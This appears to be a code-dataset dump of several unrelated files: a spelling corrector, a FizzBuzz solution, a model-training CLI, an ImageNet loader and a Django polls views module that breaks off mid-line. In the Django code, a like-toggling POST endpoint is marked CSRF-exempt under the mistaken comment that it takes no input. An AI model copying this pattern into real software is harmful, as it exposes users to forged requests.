alphabet]\r\n return set(deletes + transposes + replaces + inserts)\r\n\r\ndef known_edits2(word):\r\n return set(e2 for e1 in edits1(word) for e2 in edits1(e1) if e2 in NWORDS)\r\n\r\ndef known(words):\r\n return set(w for w in words if w in NWORDS)\r\n\r\ndef correct(word):\r\n candidates = known([word]) or known(edits1(word)) or known_edits2(word) or [word]\r\n # print(candidates)\r\n mylist=[]\r\n M1 = max(candidates, key=NWORDS.get)\r\n print(M1)\r\n candidates.remove(M1)\r\n mylist.append(M1)\r\n if(candidates):\r\n M2 = max(candidates, key=NWORDS.get)\r\n mylist.append(M2)\r\n print(M2)\r\n candidates.remove(M2)\r\n if(candidates):\r\n M3 = max(candidates, key=NWORDS.get)\r\n mylist.append(M3)\r\n print(M3)\r\n\r\n return mylist\r\n\r\nwhile(1):\r\n userInput = input(\"Enter your word:\")\r\n correct(userInput)\r\n #print(correct(userInput))","sub_path":"spelling_checker.py","file_name":"spelling_checker.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"386717395","text":"class Solution:\n def fizzBuzz(self, n: int) -> List[str]:\n mDict = {3: \"Fizz\", 5: \"Buzz\"}\n ret = []\n for i in range(1, n+1):\n string = \"\"\n for key, value in mDict.items():\n if i % key == 0:\n string += value\n if not string:\n string += str(i)\n ret.append(string)\n return ret","sub_path":"412. Fizz Buzz/solution3.py","file_name":"solution3.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"7059826","text":"import argparse\nimport os\nfrom tornado.options import parse_config_file\nfrom kb.settings import build_app_config\nfrom kb.command import TrainDoc2vecController, TrainLDAController, TrainKMeansController, MetricsController, TrainDoc2vecMongoController\n\nos.environ['TZ'] = 'UTC'\n\ncommands_available = {\n 'traind2v': TrainDoc2vecController,\n 'traind2vm': TrainDoc2vecMongoController,\n 'trainlda': TrainLDAController,\n 'trainkm': TrainKMeansController,\n 'metrics': MetricsController\n}\n\n\ndef CMD(cmd_options, settings):\n def _runner(controller_object):\n controller_object.run_main()\n\n cmd = cmd_options.command\n controller = commands_available[cmd](settings=settings, cmd_options=cmd_options)\n _runner(controller)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--command\", dest=\"command\",\n help=\"choose command to execute\",\n metavar=\"\")\n parser.add_argument(\"--lang\", dest=\"lang\",\n help=\"Choose the language\",\n metavar=\"\")\n parser.add_argument(\"--config\",\n dest=\"config\",\n help=\"path to config file\",\n metavar=\"\")\n parser.add_argument(\"--mongo_host\",\n dest=\"mongo_host\",\n help=\"Mongo host adress\",\n metavar=\"\")\n parser.add_argument(\"--mongo_port\",\n dest=\"mongo_port\",\n help=\"Mongo port\",\n metavar=\"\")\n parser.add_argument(\"--speller_enable\", dest=\"speller_enable\",\n help=\"Enabling spell corrector\",\n metavar=\"\")\n parser.add_argument(\"--classifier_model\",\n dest=\"classifier_model\",\n help=\"path to model file\",\n metavar=\"\")\n parser.add_argument(\"--classifier_model_eval\",\n dest=\"classifier_model_eval\",\n help=\"evaluate model with test split. Type Int in a range between 0 - 100\",\n metavar=\"\")\n parser.add_argument(\"--topn_return\",\n dest=\"topn_return\",\n help=\"number of predictions to return ('-1' for a full list)\",\n metavar=\"\")\n parser.add_argument(\"--input\",\n dest=\"input\",\n help=\"Train: path to CSV trainset file. Predict: path to CSV file to predict\\r\",\n metavar=\"\")\n parser.add_argument(\"--output\",\n dest=\"output\",\n help=\"Predict: name for a model file. Train: name for a prediction CSV file.\\r\",\n metavar=\"\")\n parser.add_argument(\"--csv_input_sep\",\n dest=\"csv_input_sep\",\n help=\"sep for input CSV file.\\r\",\n metavar=\"\")\n parser.add_argument(\"--csv_output_sep\",\n dest=\"csv_output_sep\",\n help=\"sep for output CSV file.\\r\",\n metavar=\"\")\n parser.add_argument(\"--train_on_csv\",\n dest=\"train_on_csv\",\n help=\"Get train data from MongoDB.\\r\",\n metavar=\"\")\n parser.add_argument(\"--clusterizer_vec_mindf\",\n dest=\"clusterizer_vec_mindf\",\n help=\"Minumum doc frequency for a term.\\r\",\n metavar=\"\")\n parser.add_argument(\"--clusterizer_vec_maxdf\",\n dest=\"clusterizer_vec_maxdf\",\n help=\"Maximum doc frequency for a term.\\r\",\n metavar=\"\")\n parser.add_argument(\"--target_col\",\n dest=\"target_col\",\n help=\"Target column in CSV.\\r\",\n metavar=\"\")\n parser.add_argument(\"--label_col\",\n dest=\"label_col\",\n help=\"Label column in CSV.\\r\",\n metavar=\"\")\n parser.add_argument(\"--clusterizer_preprocess_jobs\",\n dest=\"clusterizer_preprocess_jobs\",\n help=\"Number or processes to preprocess data.\\r\",\n metavar=\"\")\n parser.add_argument(\"--clusterizer_upperbound_len\",\n dest=\"clusterizer_upperbound_len\",\n help=\"The upper bound of message length to clusterize.\\r\",\n metavar=\"\")\n parser.add_argument(\"--clusterizer_train_limit\",\n dest=\"clusterizer_train_limit\",\n help=\"The upper bound of the number of messages to clusterize.\\r\",\n metavar=\"\")\n parser.add_argument(\"--frac\",\n dest=\"frac\",\n help=\"The percentage of messages to clusterize of the total.\\r\",\n metavar=\"\")\n parser.add_argument(\"--import_from_csv\",\n dest=\"import_from_csv\",\n help=\"Import: path to CSV file with data\\r\",\n metavar=\"\")\n parser.add_argument(\"--tokenizer\",\n dest=\"tokenizer\",\n help=\"Path to the tokenizer\\r\",\n metavar=\"\")\n\n args = parser.parse_args()\n if not args.command or args.command not in commands_available:\n parser.print_help()\n else:\n default_config_name = 'config.py'\n default_config_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../', default_config_name))\n config = args.config if args.config else default_config_path\n parse_config_file(config, final=False)\n # settings = options.group_dict('application')\n settings = build_app_config()\n\n if args.lang:\n settings['lang'] = args.lang\n if args.mongo_host:\n settings['mongo_host'] = args.mongo_host\n if args.mongo_port:\n settings['mongo_port'] = args.mongo_port\n if args.speller_enable:\n settings['speller_enable'] = bool(args.speller_enable)\n if args.tokenizer:\n settings['tokenizer'] = args.tokenizer\n if args.classifier_model:\n settings['classifier_model'] = args.classifier_model\n if args.classifier_model_eval:\n settings['classifier_model_eval'] = int(args.classifier_model_eval)\n if args.topn_return:\n settings['topn_return'] = int(args.topn_return)\n if args.input:\n settings['input'] = args.input\n if args.output:\n settings['output'] = args.output\n if args.csv_input_sep:\n settings['csv_input_sep'] = args.csv_input_sep\n if args.csv_output_sep:\n settings['csv_output_sep'] = args.csv_output_sep\n if args.train_on_csv:\n settings['train_on_csv'] = args.train_on_csv\n if args.clusterizer_vec_mindf:\n settings['clusterizer_vec_mindf'] = int(args.clusterizer_vec_mindf)\n if args.clusterizer_vec_maxdf:\n settings['clusterizer_vec_maxdf'] = int(args.clusterizer_vec_maxdf)\n if args.target_col:\n settings['target_col'] = args.target_col\n if args.label_col:\n settings['label_col'] = args.label_col\n if args.clusterizer_preprocess_jobs:\n settings['clusterizer_preprocess_jobs'] = int(args.clusterizer_preprocess_jobs)\n if args.clusterizer_upperbound_len:\n settings['clusterizer_upperbound_len'] = int(args.clusterizer_upperbound_len)\n if args.clusterizer_train_limit:\n settings['clusterizer_train_limit'] = int(args.clusterizer_train_limit)\n if args.frac:\n settings['frac'] = float(args.frac)\n if args.import_from_csv:\n settings['import_from_csv'] = args.import_from_csv\n\n CMD(cmd_options=args, settings=settings)\n","sub_path":"kb/cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":8003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"302633729","text":"from scipy import misc\nimport sys\nsys.path.append('/data/ilsrvc/')\nfrom keras.datasets import train_labels\nfrom keras.datasets import train_name\nimport numpy as np\n\n###---Importation des données : noms et labels des fichier jpg-----\nname=[]\nlabels={}\nf=file('/data/ilsvrc/train_name.txt','r')\nfor i in range(1280976):\n name.append(f.readline())\n\nf=file('/data/ilsvrc/ILSVRC2012_devkit_t12/data/labels.dat','r')\nfor i in range (1000):\n\ttemp=f.readline().split()\n\tlabels[temp[0]]=int(temp[1])\n\ndef get_name(index):\n\ttemp=name[index]\n\treturn temp[:(len(temp)-1)]\n\ndef get_label(name):\n\treturn labels[name[:9]]\n\n####-------- Chargement des images .jpg -----------\n\ndef load_data(index):\n\tX_train = np.zeros((len(index), 3, 256,256), dtype=\"uint8\")\n\ty_train = np.zeros((len(index),), dtype=\"uint8\")\n\tfor i in range(len(index)):\n\t\tname = get_name(index[i])\n\t\tpath=\"/data/ilsvrc/train/\" + str(name)\n\t\tX_train[i] = misc.imread(path).transpose()\n\t\ty_train[i] = get_label(name)\n\treturn X_train, y_train","sub_path":"keras/datasets/in_batch.py","file_name":"in_batch.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"26807049","text":"from django.http import HttpResponse, JsonResponse, HttpResponseRedirect, Http404\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User\nfrom polls.models import PollItem, PollVoting, PollFav, Ptype, SuggestedPoll\nfrom django.views.generic import TemplateView, ListView, DetailView\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView, FormView, FormMixin\nfrom users.models import PUser\nfrom django.contrib import messages\nfrom django.conf import settings\n# from variables.models import Ptype\nfrom mixins.mixins import LoginRequiredMixin, UserChangeManagerMixin, PollTypeMixin\nfrom polls.forms import PollItemAddForm, PollItemEditForm, PollItemDeleteForm, PollTopicAddForm, PollTopicEditForm, SearchForm, PollSuggAddForm, PollRecoAddForm\nfrom django.core.urlresolvers import reverse\nfrom tags.models import TagPoll, runtagcount\nfrom variable.models import TypeTopic, TypeYear, TypeLocation\nfrom analytics.models import ViewPollTypeUnique, ViewPollItemsUnique\nfrom django.db.models import Q\nfrom datetime import datetime, timedelta\nfrom analytics.models import ScorePollItemsByMonth\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core.mail import send_mail\nfrom messaging.models import Message\nfrom messaging.forms import PollItemMessageAddForm, PollItemMessageUpdateForm\nfrom django.core.cache import cache\nfrom analytics.models import PostReport\nfrom notifications.signals import notify\nimport json\n# import pandas as pd\nfrom django.db.models import Q\nimport numpy as np\nimport pytz\nfrom pytz import timezone\nfrom django.utils.timezone import utc\n# import datetime\nfrom itertools import chain\nfrom notifications.models import Notification\nimport time\nfrom celery import shared_task, task, app\nfrom analytics.models import ControlTable\n\n\n\n\n\n@task()\ndef async_report_mail(subject, contact_message, from_email, to_email):\n send_mail(\n subject=subject,\n message=\"\",\n html_message=contact_message,\n from_email=from_email,\n recipient_list=to_email,\n fail_silently=False\n )\n\n\n\n###################################\n######### Polltopicsfilter ########\n###################################\n\n\n\n\n\nclass PollTopicsView(ListView, FormView):\n model = Ptype\n template_name = \"polls/polls_types.html\"\n form_class = SearchForm\n # paginate_by = 10\n\n\n # def get(self, *args, **kwargs):\n # # if kwargs['username'] != request.user.username:\n # # return redirect('index')\n\n # reset = \"hello\"\n # if reset:\n # return HttpResponseRedirect('?year=All&location=&poll=')\n\n # return super(PollTopicsView, self).get(*args, **kwargs)\n\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollTopicsView, self).dispatch(*args, **kwargs)\n #redirect to user create checkbox on terms and conditions not checked but user has signed in\n if self.request.user.is_authenticated:\n try: \n test = PUser.objects.get(user_id=self.request.user.id)\n except:\n return redirect('PUserCreate')\n\n return dispatch\n\n\n def get_context_data(self, **kwargs):\n context = super(PollTopicsView, self).get_context_data(**kwargs)\n\n\n # if the user clicks on the the quick links from basepage it doesnt have a saved session so \n # the cat will be not capture anything and result in error therefore specify cat as pop\n\n # if self.request.GET.get('cat') is None:\n # category = self.request.session[\"cat\"]\n # else:\n # category = self.request.GET.get('cat')\n # self.request.session[\"cat\"] = category\n\n\n search = self.request.GET.get('search')\n\n todate = datetime.today()\n fromdate = datetime.today() - timedelta(days=365)\n\n if search:\n\n psearch = Ptype.objects.filter(Q(title__icontains=search) | \n Q(description__icontains=search))\n\n psearch = psearch.filter(active=True, date__gte=fromdate, date__lte=todate)\n\n # polllist = psearch.filter(active=True).exclude(id__in=[1,2]).order_by('-date')\n polllist = psearch.filter(active=True).order_by('-date')\n\n\n # if category == \"Late\":\n # context['polltype'] = \"Latest\"\n # polllist = psearch.filter(active=True).exclude(id__in=[1,2]).order_by('-date')\n\n # if category == \"Vote\":\n # context['polltype'] = \"Most Votes\"\n # polllist = psearch.filter(active=True).exclude(id__in=[1,2]).order_by('vote_count')\n\n # if category == \"Pop\":\n # context['polltype'] = \"Most Popular\"\n # # get top most popular for views\n # topview_lst = ViewPollTypeUnique.objects.filter().order_by('vcount')[:50]\n # topview_lst_id = topview_lst.values(\"p_type_id\")\n # polllist = psearch.filter(active=True, id__in=topview_lst_id).exclude(id__in=[1,2])\n\n else:\n\n cattype = self.request.GET.get('cattype')\n context['Cattype'] = ['Popular','Most-Votes']\n\n # year = self.request.GET.get('year')\n # year = TypeYear.objects.filter(title=year)\n\n location = self.request.GET.get('location')\n location = TypeLocation.objects.filter(title=location)\n\n pollcat = self.request.GET.get('poll')\n pollcat = TypeTopic.objects.filter(title=pollcat)\n\n Yeartype = Ptype.objects.values('year').distinct()\n context['Yeartype'] = TypeYear.objects.filter(active=True).order_by('title')\n\n Locationtype = Ptype.objects.values('location').distinct()\n context['Locationtype'] = TypeLocation.objects.filter(active=True).order_by('title')\n\n Topictype = Ptype.objects.values('topic').distinct()\n context['Topictype'] = TypeTopic.objects.filter(active=True).order_by('title')\n\n\n if cattype == \"All\" or not cattype:\n cattype = \"Latest\"\n\n\n\n # if year.first() is not None:\n # year = str(year.first())\n\n if cattype == \"Latest\":\n context['polltype'] = \"Latest\"\n polllist = Ptype.objects.filter(active=True).order_by('-date')\n # if year and not year == \"All\":\n # polllist = polllist.filter(date__year=year)\n if location and not location == \"All\":\n polllist = polllist.filter(location=location)\n if pollcat and not pollcat == \"All\":\n polllist = polllist.filter(topic=pollcat)\n\n # print (dir(polllist.first()))\n\n if cattype == \"Most-Votes\":\n context['polltype'] = \"Most Votes\"\n polllist = Ptype.objects.filter(active=True).order_by('vote_count')\n # if year and not year == \"All\":\n # polllist = polllist.filter(date__year=year)\n if location and not location == \"All\":\n polllist = polllist.filter(location=location)\n if pollcat and not pollcat == \"All\":\n polllist = polllist.filter(topic=pollcat)\n\n if cattype == \"Popular\":\n context['polltype'] = \"Most Popular\"\n # get top most popular for views\n topview_lst = ViewPollTypeUnique.objects.filter().order_by('vcount')[:50]\n topview_lst_id = topview_lst.values(\"p_type_id\")\n polllist = Ptype.objects.filter(active=True, id__in=topview_lst_id)\n # if year and not year == \"All\":\n # polllist = polllist.filter(date__year=year)\n if location and not location == \"All\":\n polllist = polllist.filter(location=location)\n if pollcat and not pollcat == \"All\":\n polllist = polllist.filter(topic=pollcat)\n\n\n\n # numbers_list = range(1, 1000)\n\n polllist_list = polllist\n page = self.request.GET.get('page', 1)\n paginator = Paginator(polllist_list, 10) # 5 - how much on one page\n\n try:\n polllist = paginator.page(page)\n except PageNotAnInteger:\n polllist = paginator.page(1)\n except EmptyPage:\n polllist = paginator.page(paginator.num_pages)\n \n context['polllist'] = polllist\n # this is for testing infinite pagination:\n # import time\n # time.sleep(1)\n\n\n # context['polllist'] = polllist[:50]\n\n return context\n\n\n\n\n\nclass PollSearchView(TemplateView):\n template_name = 'polls/polls_search.html'\n\n def get_context_data(self, **kwargs):\n context = super(PollSearchView, self).get_context_data(**kwargs)\n search = self.request.GET.get('search')\n # items = Ptype.objects.filter(description=search)\n items = TagPoll.objects.filter(title=search)\n\n context[\"pitems\"] = items\n\n return context\n\n\n\n\n\n###################################\n######### Pollsuggest #############\n###################################\n\n\n\n\n# class PollSuggView(LoginRequiredMixin, ListView):\n# model = SuggestedPoll\n# template_name = \"polls/poll_suggest_view.html\"\n# paginate_by = 10\n# context_object_name = 'SuggPoll'\n# queryset = SuggestedPoll.objects.filter(allowed=True).order_by('-score')\n\n# def dispatch(self, *args, **kwargs):\n# dispatch = super(PollSuggView, self).dispatch(*args, **kwargs)\n# return dispatch\n\n# def get_queryset(self):\n# new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"SG\").order_by('-score')[:5]\n# return new_context\n\n# def get_context_data(self, **kwargs):\n# context = super(PollSuggView, self).get_context_data(**kwargs)\n# return context\n\n\n\n\n#all users can suggest can suggest\n\nclass PollRecoView(LoginRequiredMixin, ListView, FormView):\n model = SuggestedPoll\n template_name = \"polls/poll_recommend_view.html\"\n paginate_by = 5\n context_object_name = 'RecoPoll'\n form_class = PollRecoAddForm\n\n # queryset = SuggestedPoll.objects.filter(allowed=True).order_by('-score')\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollRecoView, self).dispatch(*args, **kwargs)\n #redirect to user create checkbox on terms and conditions not checked but user has signed in\n if self.request.user.is_authenticated:\n try: \n test = PUser.objects.get(user_id=self.request.user.id)\n except:\n return redirect('PUserCreate')\n\n return dispatch\n\n\n\n def get_queryset(self):\n # #original\n # new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"RS\").order_by('-date')\n sort = self.request.GET.get('sort', None)\n\n #this is for shortlisting only the reccommendations from this month and ranked by votes\n d = datetime.utcnow()\n nowdate = pytz.utc.localize(d)\n enddate = nowdate - timedelta(days=90)\n\n if sort == \"Score\":\n new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"RS\", date__range=(enddate, nowdate)).order_by('-score')\n else:\n new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"RS\", date__range=(enddate, nowdate)).order_by('-date')\n\n return new_context\n\n def get_context_data(self, **kwargs):\n context = super(PollRecoView, self).get_context_data(**kwargs)\n user = self.request.user\n recolike = SuggestedPoll.objects.filter(allowed=True, typePoll=\"RS\", vote_user=user)\n context['recolike'] = recolike\n context['form'] = self.form_class()\n\n\n context[\"Addpost\"] = False\n #If user is staff there is no time limit\n if self.request.user.is_staff == True:\n context[\"Addpost\"] = True\n\n # timing\n # check if user can post based on 1 hours after the user posted\n\n user = self.request.user\n # if the user has not posted anything before\n try:\n # last time the user posted\n lpostdate = SuggestedPoll.objects.filter(user_submit=user, typePoll='RS').last().date\n\n d = datetime.utcnow()\n nowdate = pytz.utc.localize(d)\n # okdate = lpostdate + timedelta(hours=1)\n okdate = lpostdate + timedelta(minutes=1)\n\n if nowdate >= okdate:\n context[\"Addpost\"] = True\n else:\n timeleft = okdate - nowdate\n days, hours, minutes = timeleft.days, timeleft.seconds // 3600, timeleft.seconds // 60 % 60\n\n context[\"Hours\"] = hours\n context[\"Minutes\"] = minutes\n\n except:\n context[\"Addpost\"] = True\n\n return context\n\n def form_valid(self, form):\n i = form.save(commit=False)\n i.typePoll = 'RS'\n i.title = form.cleaned_data.get(\"title\")\n i.user_submit = self.request.user\n i.allowed = True\n i.save()\n\n valid_data = super(PollRecoView, self).form_valid(form)\n return JsonResponse('ok', safe=False)\n\n\n def form_invalid(self, form, **kwargs):\n return_dict = dict()\n e = form.errors['title'].as_text()\n return_dict['error'] = str(e)\n return JsonResponse(return_dict)\n\n\n def get_success_url(self):\n url = \"/polls/recommend/\"\n messages.info(self.request, \"Your recommendation has been posted\")\n return url\n\n\n\n\n\n\n\n\nclass PollSuggView(LoginRequiredMixin, ListView, FormView):\n model = SuggestedPoll\n template_name = \"polls/poll_suggest_view.html\"\n paginate_by = 5\n context_object_name = 'SuggPoll'\n form_class = PollSuggAddForm\n\n # queryset = SuggestedPoll.objects.filter(allowed=True).order_by('-score')\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollSuggView, self).dispatch(*args, **kwargs)\n #redirect to user create checkbox on terms and conditions not checked but user has signed in\n if self.request.user.is_authenticated:\n try: \n test = PUser.objects.get(user_id=self.request.user.id)\n except:\n return redirect('PUserCreate')\n\n if self.request.user.puser.memberp == True or self.request.user.puser.member == True:\n pass\n else:\n messages.info(self.request, \"This is only for subscribers\")\n return redirect('Home')\n\n return dispatch\n\n\n def get_queryset(self):\n # #original\n # new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"SG\").order_by('-date')\n sort = self.request.GET.get('sort', None)\n #this is for shortlisting only the reccommendations from this month and ranked by votes\n d = datetime.utcnow()\n nowdate = pytz.utc.localize(d)\n enddate = nowdate - timedelta(days=90)\n\n if sort == \"Score\":\n new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"SG\", date__range=(enddate, nowdate)).order_by('-score')\n else:\n new_context = SuggestedPoll.objects.filter(allowed=True, typePoll=\"SG\", date__range=(enddate, nowdate)).order_by('-date')\n\n\n return new_context\n\n def get_context_data(self, **kwargs):\n context = super(PollSuggView, self).get_context_data(**kwargs)\n user = self.request.user\n sugglike = SuggestedPoll.objects.filter(allowed=True, typePoll=\"SG\", vote_user=user)\n context['sugglike'] = sugglike\n context['form'] = self.form_class()\n\n context[\"Addpost\"] = False\n #If user is staff there is no time limit\n if self.request.user.is_staff == True:\n context[\"Addpost\"] = True\n\n # timing\n # check if user can post based on 1 hours after the user posted\n user = self.request.user\n # if the user has not posted anything before\n try:\n # last time the user posted\n lpostdate = SuggestedPoll.objects.filter(user_submit=user, typePoll='SG').last().date\n\n d = datetime.utcnow()\n nowdate = pytz.utc.localize(d)\n okdate = lpostdate + timedelta(hours=1)\n\n if nowdate >= okdate:\n context[\"Addpost\"] = True\n else:\n timeleft = okdate - nowdate\n days, hours, minutes = timeleft.days, timeleft.seconds // 3600, timeleft.seconds // 60 % 60\n\n context[\"Hours\"] = hours\n context[\"Minutes\"] = minutes\n\n except:\n context[\"Addpost\"] = True\n\n\n return context\n\n def form_valid(self, form):\n i = form.save(commit=False)\n i.typePoll = 'SG'\n i.title = form.cleaned_data.get(\"title\")\n i.user_submit = self.request.user\n i.allowed = True\n i.save()\n\n valid_data = super(PollSuggView, self).form_valid(form)\n return JsonResponse('ok', safe=False)\n\n\n def form_invalid(self, form, **kwargs):\n return_dict = dict()\n e = form.errors['title'].as_text()\n return_dict['error'] = str(e)\n return JsonResponse(return_dict)\n\n\n def get_success_url(self):\n url = \"/polls/suggestion/\"\n messages.info(self.request, \"Your suggestion has been posted\")\n return url\n\n\n\n\n\n@csrf_exempt # ok to exempt no input\ndef api_sugglikes(request):\n\n sugg_id = request.POST.get('sugg_id')\n\n if request.POST:\n if request.user.is_authenticated:\n\n sugg_id = request.POST.get('sugg_id')\n sugg_obj = SuggestedPoll.objects.filter(id=sugg_id, vote_user=request.user)\n\n if sugg_obj:\n # remove like\n sugg_obj.first().vote_user.remove(request.user)\n result = \"unliked\"\n else:\n # add like\n like = SuggestedPoll.objects.get(id=sugg_id)\n like.vote_user.add(request.user)\n result = \"liked\"\n\n try:\n sugglike_obj = SuggestedPoll.objects.get(id=sugg_id)\n sugglike_obj.sugg_score()\n likecount = sugglike_obj.score\n except:\n likecount = 0\n\n # return JsonResponse({\"result\": result})\n return JsonResponse({\"result\": result, \"resultc\": likecount })\n else:\n return JsonResponse({\"result\": \"error\", \"sugglike_obj\": \"login_requred\"})\n\n\n else:\n return redirect('/')\n\n\n\n\n\n\n\n\n\n\n###################################\n######### Poll lists ##############\n###################################\n\n\n#Polltype creation\nclass PollListCreate(LoginRequiredMixin, CreateView):\n model = Ptype\n form_class = PollTopicAddForm\n success_url = '/polls/'\n template_name = 'polls/polls_topic_create.html'\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollListCreate, self).dispatch(*args, **kwargs)\n\n\n if self.request.user.is_authenticated:\n\n try: \n test = PUser.objects.get(user_id=self.request.user.id)\n except:\n return redirect('PUserCreate')\n\n if self.request.user.is_staff == True:\n pass\n else:\n return redirect('/')\n\n #redirect user if he is banned\n user = self.request.user\n userban = PUser.objects.get(user=user)\n\n if userban.banned == True:\n messages.info(self.request, \"You have been banned from posting, please contact us if you need help\")\n return redirect('/')\n return dispatch\n\n\n # # queryset = SuggestedPoll.objects.filter(allowed=True).order_by('-score')\n # def dispatch(self, *args, **kwargs):\n # dispatch = super(PollRecoView, self).dispatch(*args, **kwargs)\n # #redirect to user create checkbox on terms and conditions not checked but user has signed in\n # if self.request.user.is_authenticated:\n # try: \n # test = PUser.objects.get(user_id=self.request.user.id)\n # except:\n # return redirect('PUserCreate')\n\n # return dispatch\n\n\n def get_context_data(self, **kwargs):\n context = super(PollListCreate, self).get_context_data(**kwargs)\n\n\n return context\n\n\n def form_valid(self, form):\n i = form.save(commit=False)\n i.c_user = self.request.user\n i.active = True\n i.freepoll = True \n i.save()\n\n tag_names = form.cleaned_data['tags'].split(\",\")\n for tag in tag_names:\n if not tag == \" \":\n tag = TagPoll.objects.get_or_create(title=str(tag).strip().lower())[0]\n tag.polltype.add(i)\n tc = TagPoll.objects.get(title=tag)\n # countt = tc.polltype.count()\n # tc.counter = countt\n tc.save()\n\n #refresh the count of all the polls attached to a tag\n runtagcount()\n\n #extracting users who favorited the tag for the polllist for the poll\n userlist = TagPoll.objects.filter(polltype=i).values_list('tagfav',flat=True)\n userlist = User.objects.filter(id__in=userlist)\n\n action = \"New Tip List\"\n message = str(i)\n\n #creating the notifications\n for user in userlist:\n notify.send(sender=self.request.user,\n recipient=user,\n polltype=i,\n pollitem=None,\n tagpoll=None,\n pollreview=None,\n action=action,\n message=message\n )\n\n\n return super(PollListCreate, self).form_valid(form)\n\n\n def get_success_url(self):\n url = \"/polls/?type=\" + str(self.object.slug)\n messages.info(self.request, \"Congratulations! Your poll has been created!\")\n return url\n\n\n\n\n\nclass PollListUpdate(LoginRequiredMixin,UpdateView): #if user is request user or staff can change\n model = Ptype\n form_class = PollTopicEditForm\n template_name = 'polls/polls_topic_update.html'\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollListUpdate, self).dispatch(*args, **kwargs)\n #exit if no poll_id\n if self.request.session.get(\"type_slug\") == None:\n return redirect('Home')\n\n #exit if user did not create poll and is not a staff\n if not (self.object.c_user == self.request.user) and not (self.request.user.is_staff):\n return redirect('Home')\n\n return dispatch\n\n def get_context_data(self, **kwargs):\n context = super(PollListUpdate, self).get_context_data(**kwargs)\n return context\n\n def get_initial(self):\n initial = super(PollListUpdate, self).get_initial()\n #sending parameters to the form so they can be used\n tags = self.get_object().tagpoll_set.all()\n initial[\"tags\"] = \", \".join([x.title for x in tags])\n return initial\n\n\n def form_valid(self, form):\n i = form.save(commit=False)\n i.c_user = self.request.user\n i.active = True\n i.freepoll = True\n i.save()\n\n\n tag_names = form.cleaned_data['tags'].split(\",\")\n obj = self.get_object()\n obj.tagpoll_set.clear()\n\n for tag in tag_names:\n if not tag == \" \":\n tag = TagPoll.objects.get_or_create(title=str(tag).strip().lower())[0]\n tag.polltype.add(i)\n tc = TagPoll.objects.get(title=tag)\n # countt = tc.polltype.count()\n # tc.counter = countt\n tc.save()\n\n #refresh the count of all the polls attached to a tag\n runtagcount()\n\n valid_data = super(PollListUpdate, self).form_valid(form)\n return valid_data\n\n def get_success_url(self):\n # type_slug = self.request.session.get(\"type_slug\")\n url = \"/polls/?type=\" + str(self.object.slug)\n messages.info(self.request, \"Your entry has been updated.\")\n return url\n\n\n\n\n\nclass PollsListView(ListView, PollTypeMixin):\n model = PollItem\n template_name = \"polls/polls_list.html\"\n # change paginate to control how many polls load on a page\n paginate_by = 5\n context_object_name = 'polls'\n queryset = PollItem.objects.filter(allowed=True).order_by('-score')\n\n\n def dispatch(self, *args, **kwargs):\n dispatch = super(PollsListView, self).dispatch(*args, **kwargs)\n # print (self.request.session.items())\n\n # to exit if this poll does not exist anymore\n if Ptype.objects.get(slug=self.request.session.get(\"type_slug\")).active == False:\n messages.info(self.request, \"This poll does not exist anymore\")\n return redirect('Home')\n\n\n return dispatch\n\n\n def get_queryset(self):\n sort = self.request.GET.get('sort', None)\n\n poll_type = self.get_pobject().id\n\n ##original scripts\n # poll_type = self.get_pobject().id\n current_page = int(self.request.GET.get('page', 1))\n\n # to default the order of poll list by score for favorites and create\n self.order = self.request.GET.get('order_by', '-score')\n\n\n if self.request.user.is_authenticated:\n\n #check what type of request /favorite list/created list or general list\n if self.request.GET.get('favorite', None):\n pt_query = PollItem.objects.filter(\n pollfav__fav_user=self.request.user,\n polltype=poll_type\n ).order_by(self.order)\n\n \n elif self.request.GET.get('create', None):\n pt_query = PollItem.objects.filter(\n user_submit=self.request.user,\n polltype=poll_type\n ).order_by(self.order)\n\n\n elif self.request.GET.get('createduser', None):\n\n try:\n #extracting the user id to query for the list of polls user created\n user_id = self.request.session.get(\"user_id\")\n c_user = User.objects.get(id=user_id)\n except:\n #exit back to home if the user is does not exist\n return redirect(\"Home\")\n\n pt_query = PollItem.objects.filter(\n user_submit=c_user,\n polltype=poll_type\n ).order_by(self.order)\n\n\n else: \n pt_query = PollItem.objects.filter()\n\n\n \n #filtering the neccessary data required by the user\n username = self.request.user.username\n # If authenticated user open first page, we get PollItems from DB and caching it\n if current_page == 1:\n if sort == \"Score\":\n pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-score')\n cache.set('pollitems_score'+username, pt_query)\n else:\n pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-pollmodifydate')\n cache.set('pollitems_date'+username, pt_query)\n\n # If authenticated user open non first page, we try get PollItems from cache\n else:\n try:\n if sort == \"Score\": \n pt_query = cache.get('pollitems_score'+username)\n else: \n pt_query = cache.get('pollitems_date'+username)\n except: # If user open non-first page directly, we get PollItems from DB and caching it\n if sort == \"Score\":\n pt_query = pt_query.filter(allowed=True, polltype=poll_type).order_by('-score')\n cache.set('pollitems_score'+username, pt_query)\n else:\n pt_query = pt_query.filter(allowed=True, 